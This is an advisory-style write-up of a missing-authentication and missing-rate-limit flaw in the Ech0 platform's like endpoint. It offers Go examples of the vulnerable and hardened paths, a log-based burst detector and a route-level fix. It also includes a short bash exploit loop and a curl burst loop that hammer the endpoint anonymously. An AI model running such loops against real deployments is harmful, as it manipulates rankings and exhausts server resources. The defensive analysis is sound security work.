Ech0 Platform, Missing Auth & Rate Limit (CVE unknown) (Critical)

How the mentioned CVE works:

The vulnerability resides in the `PUT /api/echo/like/:id` endpoint, which is registered on `PublicRouterGroup` and therefore runs without the JWT middleware. An anonymous attacker can increment the `fav_count` of any echo, private ones included, by sending repeated PUT requests with a valid UUID. The handler calls `EchoService.LikeEcho`, which calls `EchoRepository.LikeEcho`; that executes `UpdateColumn("fav_count", gorm.Expr("fav_count + ?", 1))` with no ownership, private-flag, or viewer check. The read path blocks private echoes from anonymous users; the like path does not. Each successful like triggers `InvalidateEchoCaches`, which wipes four cache keys (page, today, RSS, per-echo), so a burst of likes becomes a cache stampede. The endpoint has no rate limiting, unlike the comment endpoints, which allow 3 requests per 60 s and 20 per 3600 s. An attacker can harvest echo UUIDs from the public `/api/echo/page` endpoint and inflate likes arbitrarily; private echo UUIDs can leak through logs, Referer headers, or shared drafts. A single IP can drive unlimited database writes and cache invalidations, degrading performance and manipulating the "hot" feed ranking.
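The two paths described above, side by side, as an added example that is not Ech0's code: an in-memory stand-in for the repository with the unconditional increment the report describes, next to a hardened version that requires a caller, hides private echoes from non-admins, and allows one like per user per echo. Counters for fav_count updates and dropped cache keys make the write and invalidation amplification visible. The type names (Echo, User, Store), the likes join-table stand-in, the counters and the handling of unknown IDs are assumptions of this example.

```go
package main

import (
	"errors"
	"fmt"
)

// Echo is a minimal stand-in for the project's echo record (field names assumed).
type Echo struct {
	ID       string
	Private  bool
	FavCount int
}

// User is the caller as established by the JWT layer; nil means anonymous.
type User struct {
	ID      string
	IsAdmin bool
}

var (
	ErrUnauthenticated = errors.New("login required")
	ErrNotFound        = errors.New("echo not found")
	ErrAlreadyLiked    = errors.New("already liked")
)

// Store is an in-memory stand-in for the repository; the counters make the cost of
// each request visible (one fav_count UPDATE, four dropped cache keys).
type Store struct {
	echoes           map[string]*Echo
	likes            map[string]bool // stand-in for a UNIQUE(user_id, echo_id) join table
	FavUpdates       int             // fav_count UPDATE statements issued
	CacheKeysDropped int             // keys invalidated: page, today, RSS, per-echo
}

func NewStore(echoes ...*Echo) *Store {
	s := &Store{echoes: map[string]*Echo{}, likes: map[string]bool{}}
	for _, e := range echoes {
		s.echoes[e.ID] = e
	}
	return s
}

// FavCount returns the like counter of an echo, or 0 for an unknown ID.
func (s *Store) FavCount(id string) int {
	if e, ok := s.echoes[id]; ok {
		return e.FavCount
	}
	return 0
}

// invalidateEchoCaches mirrors InvalidateEchoCaches: every like drops all four keys.
func (s *Store) invalidateEchoCaches() { s.CacheKeysDropped += 4 }

// LikeVulnerable is the path the report describes: no caller, ownership or
// private-flag check, so any known UUID costs one UPDATE plus four cache drops per
// request. (How unknown IDs are handled is not in the report; this stand-in rejects them.)
func (s *Store) LikeVulnerable(id string) error {
	e, ok := s.echoes[id]
	if !ok {
		return ErrNotFound
	}
	e.FavCount++ // UpdateColumn("fav_count", gorm.Expr("fav_count + ?", 1))
	s.FavUpdates++
	s.invalidateEchoCaches()
	return nil
}

// LikeChecked is the hardened path: a caller is required, a private echo is hidden
// from non-admins the way the read path hides it (so the endpoint is not an oracle
// for private UUIDs), each user may like an echo once, and caches are dropped only
// when fav_count actually changed.
func (s *Store) LikeChecked(u *User, id string) (int, error) {
	if u == nil {
		return 0, ErrUnauthenticated
	}
	e, ok := s.echoes[id]
	if !ok || (e.Private && !u.IsAdmin) {
		return 0, ErrNotFound
	}
	key := u.ID + "\x00" + id // the join table's primary key
	if s.likes[key] {
		return e.FavCount, ErrAlreadyLiked
	}
	s.likes[key] = true
	e.FavCount++
	s.FavUpdates++
	s.invalidateEchoCaches()
	return e.FavCount, nil
}

func main() {
	const id = "019daf77-4a97-7c4c-a63c-791b10ecfd0b" // UUID from the report
	v, h := NewStore(&Echo{ID: id, Private: true}), NewStore(&Echo{ID: id, Private: true})
	for i := 0; i < 100; i++ {
		v.LikeVulnerable(id)                                  // anonymous, private echo, unchecked
		h.LikeChecked(&User{ID: "admin", IsAdmin: true}, id) // only the first call changes anything
	}
	fmt.Printf("vulnerable: fav=%d updates=%d keys dropped=%d\n", v.FavCount(id), v.FavUpdates, v.CacheKeysDropped)
	fmt.Printf("hardened:   fav=%d updates=%d keys dropped=%d\n", h.FavCount(id), h.FavUpdates, h.CacheKeysDropped)
}
```

A hundred unauthenticated requests against the unchecked path produce a hundred UPDATEs and four hundred cache drops on an echo the caller could not even read; against the checked path the same loop with an admin caller changes the row once and the other ninety-nine attempts return ErrAlreadyLiked.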

dailycve form:

Platform: Ech0
Version: v4.5.6
Vulnerability: Unauthenticated like inflation
Severity: Critical
date: 2026-05-08

Prediction: Patch expected 2026-05-22

What Undercode Say:

Analytics under this heading show exploitation patterns via shell commands. The sqlite query uses the table and column names given by the report (`echoes`, `private`), which may not match the live schema.

# Count like requests in the access log, then break them down per source IP (assumes the client IP is the first field)
grep "PUT /api/echo/like/" /var/log/ech0/access.log | wc -l
grep "PUT /api/echo/like/" /var/log/ech0/access.log | awk '{print $1}' | sort | uniq -c | sort -rn | head

# Monitor fav_count spikes on private echoes
sqlite3 ech0.db "SELECT id, fav_count FROM echoes WHERE private=1 ORDER BY fav_count DESC LIMIT 10;"

# Simulate cache invalidation bursts against a local instance (random UUIDs, unauthenticated)
for i in {1..100}; do curl -s -o /dev/null -X PUT "http://localhost:8300/api/echo/like/$(uuidgen)"; done
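Going beyond the one-liners above, this added example (not from the page or the project) parses constructed access-log lines in combined format and flags source IPs that send many like requests inside a short window, or that like the same echo more than once, which a deduplicated endpoint would never produce. The log format, the sample lines, the first-field client IP and the thresholds are assumptions of this example.

```go
package main

import (
	"bufio"
	"fmt"
	"regexp"
	"sort"
	"strings"
	"time"
)

// Constructed sample access log in combined format (not real Ech0 output):
// 10.0.0.9 hammers one echo UUID, 203.0.113.5 reads the page and likes once.
const sampleLog = `10.0.0.9 - - [08/May/2026:12:00:01 +0000] "PUT /api/echo/like/019daf77-4a97-7c4c-a63c-791b10ecfd0b HTTP/1.1" 200 17 "-" "curl/8.5.0"
10.0.0.9 - - [08/May/2026:12:00:01 +0000] "PUT /api/echo/like/019daf77-4a97-7c4c-a63c-791b10ecfd0b HTTP/1.1" 200 17 "-" "curl/8.5.0"
10.0.0.9 - - [08/May/2026:12:00:02 +0000] "PUT /api/echo/like/019daf77-4a97-7c4c-a63c-791b10ecfd0b HTTP/1.1" 200 17 "-" "curl/8.5.0"
10.0.0.9 - - [08/May/2026:12:00:02 +0000] "PUT /api/echo/like/019daf77-4a97-7c4c-a63c-791b10ecfd0b HTTP/1.1" 200 17 "-" "curl/8.5.0"
203.0.113.5 - - [08/May/2026:12:00:03 +0000] "GET /api/echo/page?page=1 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.9 - - [08/May/2026:12:00:03 +0000] "PUT /api/echo/like/019daf77-4a97-7c4c-a63c-791b10ecfd0b HTTP/1.1" 200 17 "-" "curl/8.5.0"
203.0.113.5 - - [08/May/2026:12:00:09 +0000] "PUT /api/echo/like/019daf77-4a97-7c4c-a63c-791b10ecfd0c HTTP/1.1" 200 17 "-" "Mozilla/5.0"
10.0.0.9 - - [08/May/2026:12:00:04 +0000] "PUT /api/echo/like/019daf77-4a97-7c4c-a63c-791b10ecfd0b HTTP/1.1" 200 17 "-" "curl/8.5.0"`

// likeLine matches PUT /api/echo/like/<uuid> requests and captures the client IP
// (assumed to be the first field), the timestamp and the echo UUID.
var likeLine = regexp.MustCompile(
	`^(\S+) \S+ \S+ \[([^\]]+)\] "PUT /api/echo/like/([0-9a-f-]{36}) HTTP/[0-9.]+"`)

type LikeEvent struct {
	IP, EchoID string
	At         time.Time
}

// ParseLikeEvents keeps only like requests and skips lines that do not parse.
func ParseLikeEvents(logText string) []LikeEvent {
	var out []LikeEvent
	sc := bufio.NewScanner(strings.NewReader(logText))
	for sc.Scan() {
		m := likeLine.FindStringSubmatch(sc.Text())
		if m == nil {
			continue
		}
		at, err := time.Parse("02/Jan/2006:15:04:05 -0700", m[2])
		if err != nil {
			continue
		}
		out = append(out, LikeEvent{IP: m[1], EchoID: m[3], At: at})
	}
	return out
}

// Finding summarises one source IP's like traffic.
type Finding struct {
	IP               string
	Requests         int  // like requests from this IP
	DistinctEchoes   int  // how many different echo UUIDs it liked
	MaxInWindow      int  // most like requests inside any single window
	RepeatedSameEcho bool // liked one echo more than once (impossible with dedup)
}

// FindBursts flags an IP that exceeds threshold likes inside window, or that likes
// the same echo twice. Events may arrive unordered; each IP's events are sorted first.
func FindBursts(events []LikeEvent, window time.Duration, threshold int) []Finding {
	byIP := map[string][]LikeEvent{}
	for _, e := range events {
		byIP[e.IP] = append(byIP[e.IP], e)
	}
	var out []Finding
	for ip, evs := range byIP {
		sort.Slice(evs, func(i, j int) bool { return evs[i].At.Before(evs[j].At) })
		f := Finding{IP: ip, Requests: len(evs)}
		perEcho := map[string]int{}
		start := 0 // left edge of the sliding window
		for i, e := range evs {
			perEcho[e.EchoID]++
			if perEcho[e.EchoID] > 1 {
				f.RepeatedSameEcho = true
			}
			for e.At.Sub(evs[start].At) >= window {
				start++
			}
			if n := i - start + 1; n > f.MaxInWindow {
				f.MaxInWindow = n
			}
		}
		f.DistinctEchoes = len(perEcho)
		if f.MaxInWindow >= threshold || f.RepeatedSameEcho {
			out = append(out, f)
		}
	}
	sort.Slice(out, func(i, j int) bool { return out[i].IP < out[j].IP })
	return out
}

func main() {
	for _, f := range FindBursts(ParseLikeEvents(sampleLog), time.Minute, 5) {
		fmt.Printf("%+v\n", f)
	}
}
```

On the sample, 10.0.0.9 is flagged on both rules (six likes within four seconds, all on one echo) while 203.0.113.5 is not; the repeated-like rule stays useful after the fix ships, because a single user liking one echo twice then signals a bypass rather than load.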

Exploit:

The attacker sends unauthenticated PUT requests to any known echo UUID: no token, no rate limit, no deduplication. Private echoes accept likes even though the attacker cannot read them. Mass requests cause database write amplification and cache stampedes.

#!/usr/bin/env bash
# Exploit script: hammer one echo's like endpoint anonymously; every request is one UPDATE plus four cache invalidations
TARGET="http://localhost:8300"
UUID="019daf77-4a97-7c4c-a63c-791b10ecfd0b"
while true; do curl -s -o /dev/null -X PUT "$TARGET/api/echo/like/$UUID"; done

Protection from this CVE

Move the endpoint to `AuthRouterGroup`, behind the JWT middleware. Add a per-user rate limit (e.g., 5 per 10 s) and a `likes` join table with a unique (user, echo) constraint so each user can like an echo once. Check the `echo.Private` flag and require admin rights to like private echoes; answer a non-admin the same way the read path does for a private echo, so the like endpoint cannot be used to confirm which private UUIDs exist. Apply the middleware at the router layer so the handler never sees an anonymous caller.

// Fixed route registration
appRouterGroup.AuthRouterGroup.PUT("/echo/like/:id",
middleware.RateLimit(5, 10),
h.EchoHandler.LikeEcho())
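The route-layer part of the fix, as an added example built on Go's standard library rather than gin (not the project's code): a bearer-token middleware standing in for the JWT middleware, a per-user sliding-window rate limit, and a handler that only ever sees an authenticated caller. The static token table, the function names and the 5-per-10-seconds budget (the report's suggestion) are assumptions of this example; the per-echo checks belong to the service layer and are left out here.

```go
package main

import (
	"context"
	"fmt"
	"net/http"
	"strings"
	"sync"
	"time"
)

// User is what the authentication middleware stores in the request context.
type User struct{ ID string }

type ctxKey struct{}

// UserFrom returns the authenticated caller, or nil for an anonymous request.
func UserFrom(r *http.Request) *User {
	u, _ := r.Context().Value(ctxKey{}).(*User)
	return u
}

// RequireUser is a constructed stand-in for the project's JWT middleware: a static
// bearer-token table instead of signature verification. Anonymous requests get 401
// here and never reach the handler, which is what the authenticated group provides.
func RequireUser(tokens map[string]*User, next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		u, ok := tokens[strings.TrimPrefix(r.Header.Get("Authorization"), "Bearer ")]
		if !ok {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		next.ServeHTTP(w, r.WithContext(context.WithValue(r.Context(), ctxKey{}, u)))
	})
}

// RateLimit allows limit requests per window per authenticated user (sliding
// window over the user's recent timestamps). It must sit behind RequireUser: the
// budget is keyed by user, not by IP, so an anonymous request is simply refused.
func RateLimit(limit int, window time.Duration, next http.Handler) http.Handler {
	var mu sync.Mutex
	hits := map[string][]time.Time{}
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		u := UserFrom(r)
		if u == nil {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		now := time.Now()
		mu.Lock()
		recent := hits[u.ID][:0] // keep only timestamps still inside the window
		for _, t := range hits[u.ID] {
			if now.Sub(t) < window {
				recent = append(recent, t)
			}
		}
		allowed := len(recent) < limit
		if allowed {
			recent = append(recent, now) // a refused attempt is not recorded
		}
		hits[u.ID] = recent
		mu.Unlock()
		if !allowed {
			http.Error(w, "too many requests", http.StatusTooManyRequests)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// LikeHandler stands in for the real like handler: it reports who liked what and
// leaves the per-echo checks (private flag, one like per user) to the service layer.
func LikeHandler(w http.ResponseWriter, r *http.Request) {
	id := strings.TrimPrefix(r.URL.Path, "/api/echo/like/")
	fmt.Fprintf(w, `{"echo":%q,"liked_by":%q}`, id, UserFrom(r).ID)
}

// NewRouter wires the route the way the registration above does: authentication
// first, then the per-user limit (5 per 10 s, the report's suggestion), then the handler.
func NewRouter(tokens map[string]*User) http.Handler {
	mux := http.NewServeMux()
	mux.Handle("/api/echo/like/",
		RequireUser(tokens, RateLimit(5, 10*time.Second, http.HandlerFunc(LikeHandler))))
	return mux
}

func main() {
	tokens := map[string]*User{"demo-token": {ID: "alice"}} // constructed credentials
	http.ListenAndServe(":8300", NewRouter(tokens))
}
```

The ordering matters: the limiter runs after authentication so its key is a user ID the caller cannot change at will, whereas an IP-keyed limiter in front of a public route is trivially spread across addresses and still lets anonymous requests reach the database.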

Impact:

  • Arbitrary inflation of `fav_count` corrupts hot feed ranking.
  • Private echoes accept likes from any UUID-knowing attacker, breaking privacy boundary.
  • Continuous DB updates + 4-key cache invalidation per like cause denial-of-service via resource exhaustion.
  • No authentication enables global exploitation from single IP.

Sources:

Reported By: github.com
Extra Source Hub:
Undercode
